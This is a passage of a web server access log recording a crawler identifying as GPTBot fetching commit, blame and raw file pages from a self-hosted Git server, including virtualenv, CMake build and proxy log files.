74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include" -[17/Feb/2026:15:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 22430] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:15:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 9936] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:15:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 17224] [Gzip 9.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:15:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9894] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site" -[17/Feb/2026:15:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:15:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" -[17/Feb/2026:15:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" -[17/Feb/2026:15:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" -[17/Feb/2026:15:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10861] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" -[17/Feb/2026:15:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:15:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:15:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:15:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 10143] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:15:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:15:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 10143] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:15:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf?display=source" [Client 74.7.227.38] [Length 11673] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" -[17/Feb/2026:15:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" -[17/Feb/2026:15:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10890] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" -[17/Feb/2026:15:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fEXE-00.toc" [Client 74.7.227.38] [Length 27178] [Gzip 8.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:15:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fPYZ-00.toc" [Client 74.7.227.38] [Length 41264] [Gzip 16.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:15:46:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fEXE-00.toc" [Client 74.7.227.38] [Length 18650] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:15:46:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fPKG-00.toc" [Client 74.7.227.38] [Length 24545] [Gzip 7.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:15:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11599] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11599] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10316] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10316] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11598] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10309] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 24948] [Gzip 10.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:15:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 98386] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:15:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 122519] [Gzip 13.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:15:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 15925] [Gzip 7.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:15:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 980605] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:15:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33677] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33678] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33678] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:46:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:46:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11062] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10806] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43112] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:15:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43108] 